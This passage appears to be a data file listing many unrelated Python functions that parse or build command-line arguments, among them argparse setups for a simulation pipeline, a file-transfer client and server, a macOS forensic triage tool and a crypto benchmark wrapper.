range(len(argument_list))]\n\n for i in range(len(arg_list)):\n for j in range(len(argument_list)):\n if arg_list[i] == argument_list[j]:\n if arg_select_list[j] == '1':\n pass\n else:\n arg_select_list[j] = '1'\n\n else:\n if arg_select_list[j] == '1':\n pass\n else:\n arg_select_list[j] = '0'\n arg_select_string += arg_select_list[j]\n\n return Signal(intbv(int(arg_select_string[-10:], 2))[10:])", "def parse_arguments_for_single_machine():\n\n # setup command line parser and parse arguments\n parser = argparse.ArgumentParser()\n\n arg_help = 'the path of the point sprite data (positions and intensities)' \n parser.add_argument('--input-directory',\n action='store',\n dest='input_directory',\n help=arg_help)\n \n arg_help = 'the directory where the configuration files will be generated'\n parser.add_argument('--output-directory',\n action='store',\n dest='output_directory',\n help=arg_help)\n\n arg_help = 'the point sprite header file (meta data of the sprite)'\n parser.add_argument('--psh-file',\n action='store', default='NO_FILE_PROVIDED',\n dest='psh_file',\n help=arg_help)\n \n arg_help = 'the data configuration file for the circuit and the sensor'\n parser.add_argument('--data-config-file',\n action='store', default='NO_FILE_PROVIDED',\n dest='data_config_file',\n help=arg_help)\n\n arg_help = 'simulation method, direct-sprite, linear-sprite, ... 
'\n parser.add_argument('--simulation-method',\n action='store', default='direct-sprite',\n dest='simulation_method',\n help=arg_help)\n\n arg_help = 'the template pbrt sensor configuration file for sprite'\n parser.add_argument('--pbrt-sprite-sensor-config',\n action='store', default='NO_FILE_PROVIDED',\n dest='pbrt_sprite_sensor_config',\n help=arg_help)\n \n arg_help = 'the template pbrt sensor configuration file for volume'\n parser.add_argument('--pbrt-volume-sensor-config',\n action='store', default='NO_FILE_PROVIDED',\n dest='pbrt_volume_sensor_config',\n help=arg_help)\n\n arg_help = 'the path of the pbrt executable that will run the simulation'\n parser.add_argument('--pbrt-executable',\n action='store', default='pbrt', # installed\n dest='pbrt_executable',\n help=arg_help)\n\n arg_help = 'the path of the sprite volumeizer executable that will ' \\\n 'convert the sprite to a volume '\n parser.add_argument('--volumizer-executable',\n action='store', default='volumizesprite', # installed \n dest='volumizer_executable',\n help=arg_help)\n \n arg_help = 'the path of the spritebounds executable that will ' \\\n 'quicky extract the bounds of the sprite to get the sensor data'\n parser.add_argument('--sprite-bounds-executable',\n action='store', default='spritebounds', # installed \n dest='spritebounds_executable',\n help=arg_help)\n\n arg_help = 'resolution of the grid converted from the sprite'\n parser.add_argument('--grid-resolution',\n action='store', default='512',\n dest='grid_resolution',\n help=arg_help)\n\n arg_help = 'running node, cluster or local, cluster by default'\n parser.add_argument('--node',\n action='store', default='cluster',\n dest='node',\n help=arg_help)\n \n arg_help = 'the base (maximum) resolution of the sensor'\n parser.add_argument('--sensor-resolution',\n action='store', default='512', \n dest='sensor_resolution',\n help=arg_help)\n\n # parse the arguments\n args = parser.parse_args()\n \n return args", "def get_arguments(self, local_machine):\n\n parser = argparse.ArgumentParser()\n\n if local_machine == \"client\":\n parser.add_argument(\"host\", help=\"target machine's host\")\n parser.add_argument(\"port\", help=\"target machine's port\", type=int)\n\n all_requests = parser.add_subparsers(help='all commands for server', dest='request', required=True)\n put_request = all_requests.add_parser('put', help='puts the specified file onto server')\n get_request = all_requests.add_parser('get', help='retrieves the specified file from server')\n all_requests.add_parser('list', help='lists the server directory')\n\n for request in put_request, get_request:\n request_help = \"file to transfer to server\" if request == put_request else \"file to retrieve from server\"\n request.add_argument('filename', help=request_help)\n\n elif local_machine == \"server\":\n parser.add_argument(\"port\", help=\"target port for listening to connections\", type=int)\n\n args = parser.parse_args()\n\n if args.port < 0 or args.port > 65535:\n raise parser.error(StatusCode.code[2002])\n self.port = args.port\n\n if local_machine == \"client\":\n self.host = args.host\n self.request = args.request\n if self.request != \"list\":\n self.file = args.filename", "def sysArgs(arguments):\n\n # if no args print usage\n if not arguments:\n print 'usage: [--auto] [--manual user_ID server_IP server_Port]'\n sys.exit()\n\n # --auto flag\n if arguments[0] == '--auto':\n return (USER_NAME, SERVER_HOST, SERVER_PORT)\n\n # --manual flag\n if arguments[0] == '--manual':\n return (arguments[1], 
arguments[2], int(arguments[3]))", "def _make_args(self, args, defaults=[], vararg=None, kwonlyargs=[],\n kw_defaults=[], kwarg=None):\n # On Python 2 convert vararg and kwarg to raw name, raise error using\n # lineno stored on the node and lexer from self.\n # On Python 3.3 extract name and annotation\n # After should be straight forward\n raise NotImplementedError()", "def arg_list():\n arg_list = [\n ['-d', '--domain', 'Specify the domain you are using'],\n ['-t', '--template-path', 'Specify template path'],\n ['-s', '--secrets-path', 'Specify template path'],\n ['-p', '--project', 'Specify a project name'],\n ['-c', '--cloud-platform', 'Specify the platform used'],\n ['-so', '--secrets-only', 'Generate secrets only'],\n ['-db', '--database-host', 'Specify the database host'],\n ['-dbc', '--database-connection-name', 'Specify the database connection name (GCP)'],\n ['-sbn', '--storage-bucket-name', 'Specify storage bucket name'],\n ['-sb', '--storage-backend', 'Specify storage backend s3/gcp/filesystem'],\n ['--acm', '--aws-cert-arn', 'Specify AWS ACM'],\n ['--sg-id', '--aws-alg-sg-id', 'Specify AWS SG ID'],\n ['--sentry', '--senty-dsn', 'Specify Sentry DSN'],\n ['-e', '--environment', 'Specify environment'],\n ['-g', '--gather', 'enable Gather yes or no'],\n ['--cm', '--cert-manager', 'Using cert manager?'],\n ['-m', '--modules', 'Aether modules i.e odk,ui,sync'],\n ['-r', '--redis-url', 'Redis endpoint for CouchDB sync'],\n ['-cdb', '--couchdb-url', 'Redis endpoint for CouchDB sync'],\n ['-gc', '--google-client-id', ' Google client ID for CouchDB sync']\n ]\n return arg_list", "def setup_args(**kargs):\n args = [get_nupack_exec_path(kargs['exec_name']),\n '-material', kargs['material'], '-sodium', kargs['sodium'],\n '-magnesium', kargs['magnesium'], '-dangles', kargs['dangles'], '-T', kargs['T']]\n if kargs['multi']: args += ['-multi']\n if kargs['pseudo']: args += ['-pseudo']\n return args", "def cmake_args(self):\n args = [\n self.define(\"CMAKE_C_COMPILER\", self.spec[\"mpi\"].mpicc),\n self.define(\"BUILD_SHARED_LIBS\", True),\n self.define(\"BUILD_TESTING\", self.run_tests),\n ]\n return args", "def _create_arguments(self, args):\n assert isinstance(args, (list, tuple))\n\n arguments = []\n index = 0\n for arg in args:\n assert isinstance(arg, (list, tuple))\n assert len(arg) == 2 or len(arg) == 3\n\n identifier = arg[0]\n if isinstance(arg[1], str):\n idl_type = self._create_type(\n arg[1], is_optional=(len(arg) == 3))\n else:\n idl_type = arg[1]\n\n default_value = None\n if len(arg) == 3:\n default_value = self._create_literal_constant(arg[2])\n\n arguments.append(\n Argument.IR(\n identifier,\n index=index,\n idl_type=idl_type,\n default_value=default_value))\n\n index += 1\n\n return arguments", "def get_arguments(context, arg_types, duals, header):\n\n if arg_types == ArgType.String:\n # All parameters are of string type\n script_args = [d.strData for d in duals]\n elif arg_types == ArgType.Numeric:\n # All parameters are of numeric type\n script_args = [d.numData for d in duals]\n elif arg_types == ArgType.Mixed:\n # Parameters can be either string, numeric or dual\n script_args = []\n for dual, param in zip(duals, header.params):\n if param.dataType == SSE.STRING:\n script_args.append(dual.strData)\n elif param.dataType == SSE.NUMERIC:\n script_args.append(dual.numData)\n elif param.dataType == SSE.DUAL:\n script_args.append((dual.numData, dual.strData))\n else:\n # Undefined argument types\n # Make sure the error handling, including logging, works as intended in the 
client\n msg = 'Undefined argument type: '.format(arg_types)\n context.set_code(grpc.StatusCode.INVALID_ARGUMENT)\n context.set_details(msg)\n # Raise error on the plugin-side\n raise grpc.RpcError(grpc.StatusCode.INVALID_ARGUMENT, msg)\n return script_args", "def test_argument_types(self):\n funcs = [\n CityHash32,\n CityHash64,\n CityHash128,\n CityHash64WithSeed,\n CityHash64WithSeeds,\n CityHash128WithSeed,\n ]\n args = [b\"ab\\x00c\", bytearray(b\"ab\\x00c\"), memoryview(b\"ab\\x00c\")]\n for func in funcs:\n values = set(func(arg) for arg in args)\n self.assertEqual(len(values), 1, values)", "def parseArguments():\n parser = argparse.ArgumentParser(description=\"AutoMacTC: an Automated macOS forensic triage collection framework.\", add_help=False)\n\n module_filter = parser.add_argument_group('module filter')\n mods = module_filter.add_mutually_exclusive_group(required=False)\n mods.add_argument('-m', '--include_modules', type=str, nargs='+', help='module(s) to use, use \"all\" to run all modules, space separated list only', default=[''], required=False)\n mods.add_argument('-x', '--exclude_modules', type=str, nargs='+', help='assumes you want to run all modules EXCEPT those specified here, space separated list only', default=[''], required=False)\n mods.add_argument('-l', '--list_modules', help='if flag is provided, will list available modules and exit.', default=False, action='store_true', required=False)\n\n general = parser.add_argument_group('general arguments')\n general.add_argument(\"-h\", \"--help\", action=\"help\", help=\"show this help message and exit\")\n general.add_argument(\"-v\", \"--verbose\", default=False, action='store_true', help=\"enable verbose logging\")\n general.add_argument('-i', '--inputdir', default='/', help='input directory; mount dmg with mountdmg.sh script and use -f to analyze mounted HFS or APFS Volume, use volume appended with \"Data\" (e.g. \"Macintosh HD - Data\") for 10.15+ systems', required=False)\n general.add_argument('-is', '--inputsysdir', default='', help='input system drive if using mounted drive from 10.15+ system (e.g. \"Macintosh HD\")', required=False)\n general.add_argument('-o', '--outputdir', default='./', help='output directory', required=False)\n general.add_argument('-p', '--prefix', help='prefix to append to tarball and/or output files', default='automactc-output', required=False)\n general.add_argument('-f', '--forensic_mode', help='if flag is provided, will analyze mounted volume provided as inputdir', default=False, action='store_true', required=False)\n general.add_argument('-nt', '--no_tarball', help='if flag is provided, will NOT package output files into tarball', default=False, action='store_true', required=False)\n general.add_argument('-nl', '--no_logfile', help='if flag is provided, will NOT generate logfile on disk', default=False, action='store_true', required=False)\n general.add_argument('-fmt', '--output_format', help='toggle between csv and json output, defaults to csv', default='csv', action='store', required=False, choices=['csv', 'json'])\n general.add_argument('-np', '--no_low_priority', help='if flag is provided, will NOT run automactc with highest niceness (lowest CPU priority). 
high niceness is default', default=False, action='store_true', required=False)\n general.add_argument('-b', '--multiprocessing', help='if flag is provided, WILL multiprocess modules [WARNING: Experimental!]', default=False, action='store_true', required=False)\n general.add_argument('-O', '--override_mount', help='if flag is provided, WILL bypass error where inputdir does not contain expected subdirs', default=False, action='store_true', required=False)\n\n console_log_args = parser.add_argument_group('console logging verbosity')\n console_logging_args = console_log_args.add_mutually_exclusive_group(required=False)\n console_logging_args.add_argument('-q', '--quiet', help='if flag is provided, will NOT output to console at all', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-r', '--rtr', help='reduce verbosity to display nicely on RTR console', default=False, action='store_true', required=False)\n console_logging_args.add_argument('-d', '--debug', help='enable debug logging to console', default=False, action='store_true', required=False)\n\n dirlist_args = parser.add_argument_group('specific module arguments')\n dirlist_args.add_argument('-K', '--dir_include_dirs', type=str, nargs='+', help='directory inclusion filter for dirlist module, defaults to volume root, space separated list only', default=[''], required=False)\n dirlist_args.add_argument('-E', '--dir_exclude_dirs', type=str, nargs='+', help='directory and file exclusion filter for dirlist module. defaults are specified in README. space separated list only. \\\n put \\'no-defaults\\' as first item to overwrite default exclusions and then provide your own exclusions', default=[''], required=False)\n dirlist_args.add_argument('-H', '--dir_hash_alg', nargs='+', help='either sha256 or md5 or both or none, at least one is recommended, defaults to sha256. also applies to autoruns module', default='sha256', required=False)\n dirlist_args.add_argument('-S', '--dir_hash_size_limit', type=int, help='file size filter for which files to hash, in megabytes, defaults to 10MB. also applies to autoruns module', default=10, required=False)\n dirlist_args.add_argument('-R', '--dir_recurse_bundles', help='will fully recurse app bundles if flag is provided. this takes much more time and space', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NC', '--dir_no_code_signatures', help='if flag is provided, will NOT check code signatures for app and kext files. also applies to autoruns module', default=False, action='store_true', required=False)\n dirlist_args.add_argument('-NM', '--dir_no_multithreading', help='if flag is provided, will NOT multithread the dirlist module', default=False, action='store_true', required=False)\n args = parser.parse_args()\n\n return args", "def parse_args():\n global QUIET\n cores = None\n directions = ['encrypt', 'decrypt']\n alg_types = ['cipher-only', 'hash-only', 'aead-only', 'cipher-hash-all']\n\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter,\n description=\"Wrapper script for the ipsec-mb \" \\\n \"performance application enabling extended functionality\")\n\n # parse and validate args\n parser.add_argument(\"-a\", \"--arch\", choices=['SSE', 'AVX', 'AVX2', 'AVX512'],\n default=None, action='append',\n help=\"set architecture to test (default tests all supported archs)\")\n parser.add_argument(\"-c\", \"--cores\", default=cores,\n help=\"list/range of cores e.g. 
2-8 or 3,4,5\")\n parser.add_argument(\"-d\", \"--direction\", default=None,\n choices=directions, help=\"Cipher direction\")\n parser.add_argument(\"-o\", \"--offset\", default=None, type=int,\n help=\"offset for the SHA size increment\")\n parser.add_argument(\"-t\", \"--alg-type\", default=None, action='append', choices=alg_types,\n help=\"algorithm types to test\")\n parser.add_argument(\"-s\", \"--job-size\", default=None,\n help=textwrap.dedent('''\\\n size of the cipher & hash job in bytes.\n It can be:\n - single value: test single size\n - list: test multiple sizes separated by commas\n - range: test multiple sizes with following format\n min:step:max (e.g. 16:16:256)\\n'''))\n parser.add_argument(\"-q\", \"--quiet\", default=False, action='store_true',\n help=\"disable verbose output\")\n parser.add_argument(\"--cold-cache\", default=False, action='store_true',\n help=\"use cold cache, it uses warm as default\")\n parser.add_argument(\"--arch-best\", action='store_true',\n help=\"detect available architectures and run only on the best one\")\n parser.add_argument(\"--shani-off\", action='store_true', help=\"don't use SHA extensions\")\n parser.add_argument(\"--force-job-api\", action='store_true',\n help=\"use JOB API for algorithms supported through direct API (i.e. AES-GCM, chacha20-poly1305)\")\n parser.add_argument(\"--unhalted-cycles\", action='store_true',\n help=textwrap.dedent('''\\\n measure using unhalted cycles (requires root).\n Note: RDTSC is used by default'''))\n parser.add_argument(\"--quick\", action='store_true',\n help=textwrap.dedent('''\\\n reduces number of test iterations by x10\n (less precise but quicker)'''))\n parser.add_argument(\"--smoke\", action='store_true',\n help=textwrap.dedent('''\\\n very quick, imprecise and without print out\n (for validation only)'''))\n parser.add_argument(\"--imix\", default=None,\n help=textwrap.dedent('''\\\n set numbers that establish occurrence proportions between packet sizes.\n It requires a list of sizes through --job-size.\n (e.g. 
--imix 4,6 --job-size 64,128 will generate\n a series of job sizes where on average 4 out of 10\n packets will be 64B long and 6 out of 10 packets\n will be 128B long)'''))\n parser.add_argument(\"--aad-size\", default=None, type=int,\n help=\"size of AAD for AEAD algorithms\")\n parser.add_argument(\"--job-iter\", default=None, type=int,\n help=\"number of tests iterations for each job size\")\n parser.add_argument(\"--no-time-box\", default=False, action='store_true',\n help=\"disables time box feature for single packet size test duration (100ms)\")\n parser.add_argument(\"--buffer-offset\", default=None, type=int,\n help=\"buffer start address offset value 0-15, default 0\")\n\n args = parser.parse_args()\n\n # validate and convert values where necessary\n if args.arch is not None and args.arch_best is True:\n print(\"{}: error: argument -a/--arch cannot be used with \" \\\n \"--arch-best\".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n if args.cores is not None:\n try:\n cores = parse_cores(args.cores)\n except:\n print(\"{}: error: argument -c/--cores: invalid value \" \\\n \"{}\".format(sys.argv[0], args.cores), file=sys.stderr)\n sys.exit(1)\n\n if args.imix is not None and args.job_size is None:\n print(\"{}: error: argument --imix must be used with \" \\\n \"--job-size\".format(sys.argv[0]), file=sys.stderr)\n sys.exit(1)\n\n if args.alg_type is not None:\n alg_types = args.alg_type\n else:\n # strip all cipher hash combinations in default run\n alg_types = alg_types[:-1]\n\n if args.direction is not None:\n directions = [args.direction]\n\n if args.quiet is True:\n QUIET = True\n\n return args.arch, cores, directions, args.offset, \\\n alg_types, args.job_size, args.cold_cache, args.arch_best, \\\n args.shani_off, args.force_job_api, args.unhalted_cycles, \\\n args.quick, args.smoke, args.imix, \\\n args.aad_size, args.job_iter, args.no_time_box, args.buffer_offset", "def process_cl_args():\n\n parser = argparse.ArgumentParser(add_help=False)\n parser.add_argument('commands', nargs='*')\n parser.add_argument('--help', '-h', action='store_true')\n parser.add_argument('--version', '-v', action='store_true')\n parser.add_argument('--debug', '-d', action='store_true')\n parser.add_argument('--logging', '-l', action='store_true')\n parser.add_argument('--no-autosize', action='store_true')\n parser.add_argument('--no-preload', action='store_true')\n args = parser.parse_args()\n\n if args.version:\n xprint(get_version_info())\n xprint(\"\")\n sys.exit()\n\n elif args.help:\n for x in helptext():\n xprint(x[2])\n sys.exit()\n\n if args.debug or os.environ.get(\"mpsytdebug\") == \"1\":\n xprint(get_version_info())\n g.debug_mode = True\n g.no_clear_screen = True\n logfile = os.path.join(tempfile.gettempdir(), \"mpsyt.log\")\n logging.basicConfig(level=logging.DEBUG, filename=logfile)\n logging.getLogger(\"pafy\").setLevel(logging.DEBUG)\n\n elif args.logging or os.environ.get(\"mpsytlog\") == \"1\":\n logfile = os.path.join(tempfile.gettempdir(), \"mpsyt.log\")\n logging.basicConfig(level=logging.DEBUG, filename=logfile)\n logging.getLogger(\"pafy\").setLevel(logging.DEBUG)\n\n if args.no_autosize:\n g.detectable_size = False\n\n g.command_line = \"playurl\" in args.commands or \"dlurl\" in args.commands\n if g.command_line:\n g.no_clear_screen = True\n\n if args.no_preload:\n g.preload_disabled = True\n\n g.argument_commands = args.commands", "def extract_argument_types(*args: Sequence[Any]) -> str:\n collapsed_args = []\n\n for arg in args:\n if is_list_like(arg):\n 
collapsed_nested = []\n for nested in arg:\n if is_list_like(nested):\n collapsed_nested.append(f\"({extract_argument_types(nested)})\")\n else:\n collapsed_nested.append(_get_argument_readable_type(nested))\n collapsed_args.append(\",\".join(collapsed_nested))\n else:\n collapsed_args.append(_get_argument_readable_type(arg))\n\n return \",\".join(collapsed_args)", "def test_cmdlineproc_test1():\n\n parameters = {\n \"debug\": False,\n \"disconnect\": False,\n \"executable\": \"\",\n \"executableargs\": \"\",\n \"hosts\": \"\",\n \"job\": \"\",\n \"jobname\": \"\",\n \"log\": \"\",\n \"recover\": \"\",\n \"resource\": \"\",\n \"replicates\": \"\",\n \"verbose\": False\n }\n\n commandlineargs = []\n\n longbowargs = _commandlineproc(ALLLONGBOWARGS, commandlineargs, parameters)\n\n assert parameters[\"executable\"] == \"\"\n assert parameters[\"executableargs\"] == \"\"\n assert longbowargs == []", "def get_change_tool_args(self,comArgs):\n params, flags = self.get_params(comArgs)\n args = [params.get('T')] \n return args", "def Args(parser):", "def _build_arguments(self):\n # TODO: comeback to allow test path override. maybe?\n # self._parser.add_argument(\n # '--test-path',\n # type=utils.validate_path,\n # required=False,\n # help=('Path th projects test Dockerfile. Dockerfile should be in the root of the test directory.')\n # )\n self._parser.add_argument(\n '--configs',\n type=bool,\n required=False,\n default=False,\n help=\"Would you like to inject configuration files?\"\n )", "def get_init_arguments_and_types(cls) -> List[Tuple[str, Tuple, Any]]:\n return get_init_arguments_and_types(cls)", "def fetch_arguments(op_def, arg, ws):\n return [fetch_argument(op_def, desc, ws) for desc in arg.strings]", "def __init__(self, name, rettype, args):\n self.name, self.rettype, self.args = name, rettype, args", "def _pull_argops(op_dict):\n import inspect\n out = []\n keys = op_dict.keys()\n keys.sort() # Not necessary, but makes scanning the printout easier\n for k in keys:\n # Create a dictionary that will be used to fill the 'code' template\n d = {}\n d[\"enum_name\"] = enum_name = op_dict[k][3:] # <NAME>\n d[\"funct_name\"] = \"%s\" % enum_name.lower() # <name>\n class_name = \"%s4args\" % enum_name\n klass = getattr(_type, class_name, None)\n if klass is None:\n # This operation takes no arguments\n d[\"funct_args\"] = d[\"create_args\"] = d[\"set_args\"] = \"\"\n else:\n if type(klass) is dict:\n arg_list = \"enum_value\"\n d[\"create_args\"] = \"args = enum_value\"\n else:\n arg_list = \", \".join(inspect.getargspec(klass.__init__)[0][1:])\n d[\"create_args\"] = \"args = _type.%s(%s)\" % (class_name, arg_list)\n d[\"funct_args\"] = arg_list\n if enum_name.startswith(\"CB_\"):\n d[\"set_args\"] = \"opcb%s=args\" % enum_name.lower()[3:]\n else:\n d[\"set_args\"] = \"op%s=args\" % enum_name.lower()\n if enum_name.startswith(\"CB_\"):\n d[\"argop\"] = \"nfs_cb_argop4\"\n else:\n d[\"argop\"] = \"nfs_argop4\"\n out.append(d)\n return out", "def test_type_kwarg(self, parse_input):\n bb = parse_input(\"name testname\\nversion 1.0\\ntarget example (6)\\ntype example (copies=1000)\")\n assert bb.programtype[\"options\"] == {\"copies\": 1000}", "def robotics_arg_parser():\n parser = arg_parser()\n parser.add_argument('--env', help='environment ID', type=str, default='FetchReach-v0')\n parser.add_argument('--seed', help='RNG seed', type=int, default=0)\n parser.add_argument('--num-timesteps', type=int, default=int(1e6))\n return parser", "def __add_common_args(parser: argparse.ArgumentParser):\n 
parser.add_argument(\"--model\", help=\"name of the model to use. Use query --get-models to get a list of valid names.\")\n parser.add_argument(\"--grid-type\", help=\"type of the grid to use.\")\n parser.add_argument(\"--level-type\", help=\"type of the vertical level to use.\")\n parser.add_argument(\"--init-time\", help=f\"initialization time to use. \"\n \"Integers are interpreted as hours since model start, dates formatted as \"\n f\"{__DATE_FORMAT.replace('%Y', 'YYYY').replace('%m', 'MM').replace('%d', 'DD').replace('%H', 'HH').replace('%M', 'MM')} are interpreted as absolute start dates.\")\n parser.add_argument(\"--variable\", nargs=\"+\", help=\"name of the variable to use. Use query --get-vars to get a list of valid names.\")\n parser.add_argument(\"--levels\", nargs=\"+\", type=int, help=\"levels to use.\")\n parser.add_argument(\"--lead-time\", nargs=\"+\", type=int, help=\"lead times to use in hours.\")", "def args(self):\n return (\n self.species_names,\n self.rxn_names,\n self.react_stoic,\n self.prod_stoic,\n self.init_state,\n self.k_det,\n self.chem_flag,\n self.volume,\n )", "def unit_test_obj_mk_tellu(p, rname, inputs):\n # define name and arguments\n name = 'obj_mk_tellu'\n arg_names = ['night_name', 'files']\n arg_types = [str, list]\n\n # get arguments\n args = get_args(p, name, rname, inputs, arg_names, arg_types)\n return args, name", "def test_args(self):\n parser = argparse.ArgumentParser(\n prog=\"sysbottle\", description=\"sysbottle is parsed\"\n )\n subparsers = parser.add_subparsers()\n sysbottle.build(subparsers)\n args = parser.parse_args(\n [\n \"sysbottle\",\n \"abc.txt\",\n \"-c\",\n \"90\",\n \"-q\",\n \"1\",\n \"-d\",\n \"sda\",\n \"-i\",\n \"5\",\n \"-t\",\n \"3\",\n ]\n )\n self.assertTrue(hasattr(args, \"file\"))\n self.assertTrue(hasattr(args, \"cpu\"))\n self.assertTrue(hasattr(args, \"diskQ\"))\n self.assertTrue(hasattr(args, \"disks\"))\n self.assertTrue(hasattr(args, \"iowait\"))\n self.assertTrue(hasattr(args, \"throughput\"))", "def parseargs(p):\n p.set_defaults(func=func)\n p.description = \"Print machine architecture.\"\n return p", "def get_type(args_str, entry_type):\r\n # The C-method-implementations accept self as the first argument,\r\n # so a one-argument method will be invoked with zero arguments in Python.\r\n no_args = 1 if entry_type == \"method\" else 0\r\n return (\"METH_NOARGS\" if len(args_str.split(\",\")) == no_args\r\n else \"METH_VARARGS\")", "def parse_args ( self , dataset = None , *args , **kwargs ) :\n _args = []\n for a in args :\n if not isinstance ( a , ROOT.RooCmdArg ) :\n self.error ( 'parse_args: unknown argument type %s/%s, skip' % ( a , type ( a ) ) )\n else : _args.append ( a ) \n\n from ostap.plotting.fit_draw import keys as drawing_options\n\n silent = None\n verbose = None\n \n for k , a in items_loop ( kwargs ) :\n \n klow = k.lower ().replace('_','')\n kup = k.upper ().replace('_','')\n \n ## skip \"drawing\" options \n if klow in drawing_options : continue \n if klow in ( 'draw' ,\n 'drawoption' ,\n 'drawoptions' ) : continue \n \n if isinstance ( a , ROOT.RooCmdArg ) : _args.append ( a )\n \n elif kup in ( 'VERBOSE' , ) and isinstance ( a , bool ) :\n \n if not verbose is None :\n if a != verbose : \n logger.warning ( 'parse_args: Redefine VERBOSE to %s' % a ) \n verbose = a \n if not silent is None :\n if a == silent :\n logger.warning ( 'parse_args: confusing VERBOSE/SILENT %s/%s' % ( a , silent ) )\n silent = not a \n _args.append ( ROOT.RooFit.Verbose ( a ) )\n elif kup in ( 'SILENT' ,\n 'SILENCE' 
) and isinstance ( a , bool ) :\n if not silent is None :\n if a != silent : \n logger.warning ( 'parse_args: Redefine SILENT to %s' % a ) \n verbose = a \n if not verbose is None :\n if a == verbose :\n logger.warning ( 'parse_args: confusing SILENT/VERBOSE %s/%s' % ( a , verbose ) )\n verbose = not a\n _args.append ( ROOT.RooFit.Verbose ( not a ) ) \n elif kup in ( 'STRATEGY' , \n 'MINUITSTRATEGY' ,\n 'STRATEGYMINUIT' ) and isinstance ( a , integer_types ) and 0 <= a <= 2 : \n _args.append ( ROOT.RooFit.Strategy ( a ) ) \n elif kup in ( 'PRINTLEVEL' ,\n 'MINUITPRINT' ,\n 'MINUITLEVEL' ) and isinstance ( a , integer_types ) and -1 <= a <= 3 :\n _args.append ( ROOT.RooFit.PrintLevel ( a ) ) \n elif kup in ( 'PRINTEVALERRORS' ,\n 'PRINTERRORS' ,\n 'ERRORSPRINT' ) and isinstance ( a , integer_types ) and -1 <= a :\n _args.append ( ROOT.RooFit.PrintEvalErrors ( a ) ) \n elif kup in ( 'TIMER' ,\n 'TIMING' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Timer ( a ) ) \n elif kup in ( 'WARNING' ,\n 'WARNINGS' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Warnings ( a ) ) \n \n elif kup in ( 'SUMW2' ,\n 'SUMW2ERR' ,\n 'SUMW2ERROR' ,\n 'SUMW2ERRORS' ) and isinstance ( a , bool ) :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: SumW2-flag is True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: SumW2-flag is False for weighted dataset') \n\n _args.append ( ROOT.RooFit.SumW2Error( a ) )\n \n elif kup in ( 'ASYMPTOTIC' ,\n 'ASYMPTOTICERR' ,\n 'ASYMPTOTICERROR' ,\n 'ASYMPTOTICERRORS' ) and isinstance ( a , bool ) and 61900 <= root_version_int :\n \n if a and dataset and dataset.isWeighted() : pass \n elif a and dataset and not dataset.isWeighted() :\n self.warning ('parse_args: AsymptoticError-flag is True for non-weighted dataset')\n elif dataset and not dataset.isWeighted() and not a : pass \n elif dataset and dataset.isWeighted() and not a :\n self.warning ('parse_args: AsymptoticError-flag is False for weighted dataset') \n\n if a and root_version_int < 62006 :\n self.warning (\"``Asymptotic=True'' will crash if Title!=Name (ROOT-10668)\")\n \n _args.append ( ROOT.RooFit.AsymptoticError ( a ) )\n \n elif kup in ( 'BATCH' ,\n 'BATCHMODE' ) and isinstance ( a , bool ) and 62000 <= root_version_int :\n _args.append ( ROOT.RooFit.BatchMode ( a ) ) \n elif kup in ( 'EXTENDED' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Extended ( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and isinstance ( a , int ) and 1<= a : \n _args.append ( ROOT.RooFit.NumCPU( a ) ) \n elif kup in ( 'CPU' ,\n 'CPUS' ,\n 'NCPU' ,\n 'NCPUS' ,\n 'NUMCPU' ,\n 'NUMCPUS' ) and \\\n isinstance ( a , list_types ) and 2 == len ( a ) and \\\n isinstance ( a[0] , integer_types ) and 1 <= a[1] and \\\n isinstance ( a[1] , integer_types ) and 0 <= a[1] <=3 :\n _args.append ( ROOT.RooFit.NumCPU( a[0] , a[1] ) ) \n \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ,\n 'RANGES' ,\n 'FITRANGES' ) and isinstance ( a , string_types ) :\n _args.append ( ROOT.RooFit.Range ( a ) ) \n elif kup in ( 'RANGE' ,\n 'FITRANGE' ) and isinstance ( a , list_types ) \\\n and isinstance ( a[0] , num_types ) \\\n and isinstance ( a[1] , num_types ) \\\n and a[0] < a[1] : \n _args.append ( ROOT.RooFit.Range ( a[0] , a[1] ) )\n elif kup in ( 'MINIMIZER' , ) and isinstance ( a , 
list_types ) \\\n and isinstance ( a[0] , string_types ) \\\n and isinstance ( a[1] , string_types ) :\n _args.append ( ROOT.RooFit.Minimizer ( a[0] , a[1] ) ) \n elif kup in ( 'HESSE' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Hesse ( a ) )\n elif kup in ( 'INITIALHESSE' ,\n 'INITHESSE' ,\n 'HESSEINIT' ,\n 'HESSEINITIAL' ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.InitialHesse ( a ) )\n elif kup in ( 'OPTIMIZE' ,\n 'OPTIMISE' ) and isinstance ( a , integer_types ) :\n _args.append ( ROOT.RooFit.Optimize ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , bool ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , ROOT.RooArgSet ) :\n _args.append ( ROOT.RooFit.Minos ( a ) )\n elif kup in ( 'MINOS' , ) and isinstance ( a , string_types ) \\\n and hasattr ( self , 'params' ) and a in self.params ( dataset ) : \n _v = self.params()[ a ]\n _s = ROOT.RooArgSet ( _v )\n self.aux_keep.append ( _s ) \n _args.append ( ROOT.RooFit.Minos ( _s ) ) \n elif kup in ( 'MINOS' , ) and not isinstance ( a , string_types ) :\n\n _s = ROOT.RooArgSet()\n _pars = self.params ( dataset ) if hasattr ( self , 'params' ) else ROOT.RooArgSet() \n for v in a :\n if v in _pars and isinstance ( v , string_types ):\n _v = _pars [ v ] \n _s.add ( _v )\n elif v in _pars and isinstance ( v , ROOT.RooAbsArg ) :\n _s.add ( v )\n else :\n self.error ( \"Can not find %s in parameetrs\" % v )\n\n self.aux_keep.append ( 